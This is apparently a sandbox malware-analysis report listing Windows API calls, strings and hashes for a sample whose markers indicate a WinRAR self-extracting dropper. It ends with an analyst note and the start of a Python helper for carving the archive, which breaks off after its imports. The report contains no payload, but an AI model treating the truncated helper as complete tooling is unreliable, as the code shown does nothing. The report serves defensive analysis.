                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00294DDA,00294D3D,00294FDE), ref: 00294D76
                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00294D8C
                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00294DA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive$p],
                                        • API String ID: 667068680-2660665386
                                        • Opcode ID: dc471c4615f2fb3078951bfcfbe53b69e8c4aab618415fd6e97cad84a8c409fb
                                        • Instruction ID: c5c8db4cbbc207ae027ccc3b99a459e0d7564a3ff5e77f5582baca4cae8ea5ec
                                        • Opcode Fuzzy Hash: dc471c4615f2fb3078951bfcfbe53b69e8c4aab618415fd6e97cad84a8c409fb
                                        • Instruction Fuzzy Hash: 57F0C239631B23AB0F617EB46C88F7722D8AE077593110139D602D2680EA50DCB386F0
                                        APIs
                                        • __aulldiv.LIBCMT ref: 0028783D
                                          • Part of subcall function 0028067E: GetVersionExW.KERNEL32(?), ref: 002806AF
                                        • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00287860
                                        • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00287872
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00287883
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00287893
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002878A3
                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002878DE
                                        • __aullrem.LIBCMT ref: 00287984
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                        • String ID:
                                        • API String ID: 1247370737-0
                                        • Opcode ID: e9a6397e884f0bead76af10329b38255852077923ec31b422accc72a794e0bc2
                                        • Instruction ID: 7622184e7b53d079675936882d07b63294697d396b7733747040912d193d3116
                                        • Opcode Fuzzy Hash: e9a6397e884f0bead76af10329b38255852077923ec31b422accc72a794e0bc2
                                        • Instruction Fuzzy Hash: 8F5155B1508305AFD710DF64D88496BFBE9FF88314F108A2EF59AD2250E738E958CB52
                                        APIs
                                        • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00292B66
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                          • Part of subcall function 00280BF3: _wcslen.LIBCMT ref: 00280C03
                                        • EndDialog.USER32(?,00000001), ref: 00292EDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _wcslen$DialogPathTemp
                                        • String ID: $@set:user$\S,$\S,
                                        • API String ID: 2172748170-1925104358
                                        • Opcode ID: 602622f81256ef74b6835b9095eddff8207670a8eca65aa2e2374343a0e305ca
                                        • Instruction ID: efa4367d79ae8302c5a337cd36f1d885d25427a3433ffc4decdc77c739ee3c3a
                                        • Opcode Fuzzy Hash: 602622f81256ef74b6835b9095eddff8207670a8eca65aa2e2374343a0e305ca
                                        • Instruction Fuzzy Hash: ECC14C30C21269EADF24EBA4DC45BDDBBB8AF15300F4440DAE449B3292DB705B99CF61
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00280E50
                                        • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00280E85
                                        • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00280EC4
                                        • _wcslen.LIBCMT ref: 00280ED4
                                        • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00280F51
                                        • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00280F93
                                        • _wcslen.LIBCMT ref: 00280FA3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FullNamePath$_wcslen$H_prolog3_
                                        • String ID:
                                        • API String ID: 840513527-0
                                        • Opcode ID: f9ed3f7e1c062b674905f4ccc555193a981fe5bfa7c47be25bf078b16367a36d
                                        • Instruction ID: bc98cc631352dee69e4ef6bed387b2adc3727b88319052d0435d4dcb0d8b2c2f
                                        • Opcode Fuzzy Hash: f9ed3f7e1c062b674905f4ccc555193a981fe5bfa7c47be25bf078b16367a36d
                                        • Instruction Fuzzy Hash: 54618C75D21209ABDF14EFA8DC84AEEBBBDAF85710F14410AF814E7281DB34D965CB60
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002A69AE,?,00000000,?,00000000,00000000), ref: 002A627B
                                        • __fassign.LIBCMT ref: 002A62F6
                                        • __fassign.LIBCMT ref: 002A6311
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002A6337
                                        • WriteFile.KERNEL32(?,?,00000000,002A69AE,00000000,?,?,?,?,?,?,?,?,?,002A69AE,?), ref: 002A6356
                                        • WriteFile.KERNEL32(?,?,00000001,002A69AE,00000000,?,?,?,?,?,?,?,?,?,002A69AE,?), ref: 002A638F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: e014f3cd93e490c59deef3ea2de20d328fdba43d914cb91ad8570ac61396380f
                                        • Instruction ID: 3276d791669e32144a1c35384ce2d76bd7c080f50e02ea4542f4747b6baf7191
                                        • Opcode Fuzzy Hash: e014f3cd93e490c59deef3ea2de20d328fdba43d914cb91ad8570ac61396380f
                                        • Instruction Fuzzy Hash: CE510770E10249DFDF10CFA8D849AEEBBF8EF0A710F18455AE542E3291EB709951CB50
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 002993F7
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002993FF
                                        • _ValidateLocalCookies.LIBCMT ref: 00299488
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 002994B3
                                        • _ValidateLocalCookies.LIBCMT ref: 00299508
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        APIs
                                          • Part of subcall function 002A3518: _free.LIBCMT ref: 002A3541
                                        • _free.LIBCMT ref: 002A35A2
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 002A35AD
                                        • _free.LIBCMT ref: 002A35B8
                                        • _free.LIBCMT ref: 002A360C
                                        • _free.LIBCMT ref: 002A3617
                                        • _free.LIBCMT ref: 002A3622
                                        • _free.LIBCMT ref: 002A362D
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        APIs
                                        • LoadBitmapW.USER32(00000065), ref: 002907F5
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0029081A
                                        • DeleteObject.GDI32(00000000), ref: 0029084C
                                        • DeleteObject.GDI32(00000000), ref: 0029086F
                                          • Part of subcall function 0028EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00290845,00000066), ref: 0028EBE6
                                          • Part of subcall function 0028EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EBFD
                                          • Part of subcall function 0028EBD3: LoadResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EC14
                                          • Part of subcall function 0028EBD3: LockResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EC23
                                          • Part of subcall function 0028EBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00290845,00000066), ref: 0028EC3E
                                          • Part of subcall function 0028EBD3: GlobalLock.KERNEL32(00000000), ref: 0028EC4F
                                          • Part of subcall function 0028EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0028EC73
                                          • Part of subcall function 0028EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0028ECB8
                                          • Part of subcall function 0028EBD3: GlobalUnlock.KERNEL32(00000000), ref: 0028ECD7
                                          • Part of subcall function 0028EBD3: GlobalFree.KERNEL32(00000000), ref: 0028ECDE
                                        Similarity
                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                        • String ID: Pl)uDK)$]
                                        • API String ID: 1797374341-538808356
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0029C5A2,0029C5A2,?,?,?,002A185A,00000001,00000001,C5E85006), ref: 002A1663
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002A185A,00000001,00000001,C5E85006,?,?,?), ref: 002A16E9
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002A17E3
                                        • __freea.LIBCMT ref: 002A17F0
                                          • Part of subcall function 002A040E: RtlAllocateHeap.NTDLL(00000000,0029535E,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?,?,?,?), ref: 002A0440
                                        • __freea.LIBCMT ref: 002A17F9
                                        • __freea.LIBCMT ref: 002A181E
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        APIs
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00287B06
                                          • Part of subcall function 0028067E: GetVersionExW.KERNEL32(?), ref: 002806AF
                                        • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00287B2A
                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00287B44
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00287B57
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00287B67
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00287B77
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion
                                        • String ID:
                                        • API String ID: 2092733347-0
                                        APIs
                                        • FileTimeToSystemTime.KERNEL32(?,?,D946AC94,?,?,?,?,002AAA27,000000FF), ref: 0028F38A
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,002AAA27,000000FF), ref: 0028F399
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,002AAA27,000000FF), ref: 0028F3A7
                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,002AAA27,000000FF), ref: 0028F3B5
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,002AAA27,000000FF), ref: 0028F3D0
                                        • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,002AAA27,000000FF), ref: 0028F3FA
                                        Similarity
                                        • API ID: Time$System$File$Format$DateLocalSpecific
                                        • String ID:
                                        • API String ID: 909090443-0
                                        APIs
                                        • _wcslen.LIBCMT ref: 002931A4
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: .lnk$0$lnk$S,
                                        • API String ID: 176396367-3971810066
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00299771,002996CC,00296A64), ref: 00299788
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00299796
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002997AF
                                        • SetLastError.KERNEL32(00000000,00299771,002996CC,00296A64), ref: 00299801
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,0029B581,?,002BE088,?,0029AE80,?,002BE088,?,00000007), ref: 002A0009
                                        • _free.LIBCMT ref: 002A003C
                                        • _free.LIBCMT ref: 002A0064
                                        • SetLastError.KERNEL32(00000000,002BE088,?,00000007), ref: 002A0071
                                        • SetLastError.KERNEL32(00000000,002BE088,?,00000007), ref: 002A007D
                                        • _abort.LIBCMT ref: 002A0083
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00293FDB
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00293FF5
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00294006
                                        • TranslateMessage.USER32(?), ref: 00294010
                                        • DispatchMessageW.USER32(?), ref: 0029401A
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00294025
                                        Similarity
                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 2148572870-0
                                        APIs
                                          • Part of subcall function 0028EBAA: GetDC.USER32(00000000), ref: 0028EBAE
                                          • Part of subcall function 0028EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0028EBB9
                                          • Part of subcall function 0028EBAA: ReleaseDC.USER32(00000000,00000000), ref: 0028EBC4
                                        • GetObjectW.GDI32(?,00000018,?), ref: 0028EF65
                                          • Part of subcall function 0028F1EC: GetDC.USER32(00000000), ref: 0028F1F5
                                          • Part of subcall function 0028F1EC: GetObjectW.GDI32(?,00000018,?), ref: 0028F224
                                          • Part of subcall function 0028F1EC: ReleaseDC.USER32(00000000,?), ref: 0028F2BC
                                        Similarity
                                        • API ID: ObjectRelease$CapsDevice
                                        • String ID: ($Pl)uDK)$kJ)
                                        • API String ID: 1061551593-3192220080
                                        APIs
                                        • GetDlgItem.USER32(?,00000066), ref: 002926A9
                                        • SendMessageW.USER32(00000000,00000143,00000000,002C5380), ref: 002926D6
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00292702
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 002925F4
                                        • ProgramFilesDir, xrefs: 002925E0
                                        Similarity
                                        • API ID: MessageSend$Item
                                        • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                        • API String ID: 3888421826-2634093826
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027A307
                                        • GetLastError.KERNEL32(00000054,?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027A427
                                          • Part of subcall function 0027AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0027AC2E
                                          • Part of subcall function 0027AC11: GetLastError.KERNEL32 ref: 0027AC72
                                          • Part of subcall function 0027AC11: CloseHandle.KERNEL32(?), ref: 0027AC81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege$K)
                                        • API String ID: 2235100918-3651858649
                                        • Opcode ID: 0d5af36fbf85f95e5ea72de2443f76396ec64754b632b8dc6756b93b2c3aa548
                                        • Instruction ID: da97e31bb07610b8db17fd7de4287a20c5fb544db44e04d661a4ca2f5a1c232e
                                        • Opcode Fuzzy Hash: 0d5af36fbf85f95e5ea72de2443f76396ec64754b632b8dc6756b93b2c3aa548
                                        • Instruction Fuzzy Hash: 69417370E20219ABDF14EFE8E899BEDB7B8AF48314F04801EF505B7241DB7599548F25
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _wcslen$H_prolog3
                                        • String ID: &nbsp;$<br>
                                        • API String ID: 1035939448-26742755
                                        • Opcode ID: d4606c007d23917a0fcbebbc7c413d2ef81441c9553c53928d21a1b24de85e57
                                        • Instruction ID: 81dff6ed67796ebbc1b5b0566b6c659514e09a13ccc2c2c8a508a9aae6bcdcb7
                                        • Opcode Fuzzy Hash: d4606c007d23917a0fcbebbc7c413d2ef81441c9553c53928d21a1b24de85e57
                                        • Instruction Fuzzy Hash: 8A416F3AB612119BDB15AF54C881B3D7336FF95704F60842AE4068F2C1EBB19DA6CBD1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_wcslen
                                        • String ID: BL)$VL)$`L)
                                        • API String ID: 3746244732-3221003899
                                        • Opcode ID: 5df4bbf87d17d03148c0f15822b83d3f044657af83b87ee621c4012f7a595daa
                                        • Instruction ID: f52ca1effff2c2c4c8b1871ade406186740eb870ca92b78247d36e5dde793609
                                        • Opcode Fuzzy Hash: 5df4bbf87d17d03148c0f15822b83d3f044657af83b87ee621c4012f7a595daa
                                        • Instruction Fuzzy Hash: E2410871A2110AAFDF04DFA8DD899EE77B9FF09314B104119F855AB2A1DB309E20CB64
                                        APIs
                                          • Part of subcall function 0028FEA7: GetCurrentProcess.KERNEL32(00020008,?), ref: 0028FEB6
                                          • Part of subcall function 0028FEA7: GetLastError.KERNEL32 ref: 0028FEE1
                                        • CreateDirectoryW.KERNEL32(?,?), ref: 0028FB23
                                        • LocalFree.KERNEL32(?), ref: 0028FB31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                        • String ID: .L)$8L)$tL)
                                        • API String ID: 1077098981-630498960
                                        • Opcode ID: 4956e262f5eaf1394471d0813c4d4378d8721dabded32cabdd2063d7234ef5e6
                                        • Instruction ID: f5172845ff8987174576782d22597b75bc3ff4cfdfd4780eb52e59ec11179bd2
                                        • Opcode Fuzzy Hash: 4956e262f5eaf1394471d0813c4d4378d8721dabded32cabdd2063d7234ef5e6
                                        • Instruction Fuzzy Hash: 6921E6B590120A9BDF10DFA5E9889EEBBF8FF48314F10452AE815E3150D7349A15CBA0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID: BL)$LL)$Software\WinRAR SFX$jL)
                                        • API String ID: 2427045233-653404485
                                        • Opcode ID: 1819d2be661f9ebd17f0a7fa0c0e76cd1b3002a512befd8413a7cc556d2f9240
                                        • Instruction ID: 58d42b6fd13733af99525461b9d63cbc92ace688d17316417081c4b071c24ab0
                                        • Opcode Fuzzy Hash: 1819d2be661f9ebd17f0a7fa0c0e76cd1b3002a512befd8413a7cc556d2f9240
                                        • Instruction Fuzzy Hash: 1D214D71920219EBDF20DFA5EC89EEEBBB9FF88710F10441AF541A2150D7709A94CB60
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00293F03
                                        • SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00293F1B
                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00293F86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariable$H_prolog3_
                                        • String ID: sfxcmd$sfxpar
                                        • API String ID: 3605364767-3493335439
                                        • Opcode ID: 329c241512ab7f7732ec5842938e4e756a56fe4fe5fa8810f6561adafd168c80
                                        • Instruction ID: 94cedf22fbe737a730001045c38793817e4b040a704dfd5f71d89c8d3427e7e4
                                        • Opcode Fuzzy Hash: 329c241512ab7f7732ec5842938e4e756a56fe4fe5fa8810f6561adafd168c80
                                        • Instruction Fuzzy Hash: 33212570E21218DFCF14DFA8E9889EDB7F9EF09300B10442AF446A7640DB30AA65CF65
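The two functions above are the ones that identify the outer layer of this sample: one reads the "Software\WinRAR SFX" registry path, the other sets the "sfxcmd" and "sfxpar" environment variables through SetEnvironmentVariableW, which is the behaviour of a WinRAR self-extracting stub. For an analyst that means the payload can usually be carved from the file overlay and listed or extracted with an archiver instead of detonating the dropper. The Python below is an added triage helper, not code from the Joe Sandbox report or from WinRAR: it checks for those marker strings (ASCII and UTF-16LE, since the calls are the wide variants), computes where the PE's sections end, and carves the appended RAR archive. The RAR 4.x and RAR 5.0 marker-block signatures and the minimal PE builder used for the sample input are my assumptions for the demonstration; the sample bytes are constructed inline and are not the analysed binary.

```python
"""Triage helper for a WinRAR SFX stub: confirm the marker strings seen in the
report and carve the appended archive from the PE overlay.
Added example, not code from the Joe Sandbox report. Assumptions: the RAR
marker-block signatures below and the constructed sample built by build_fake_sfx."""
import struct
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

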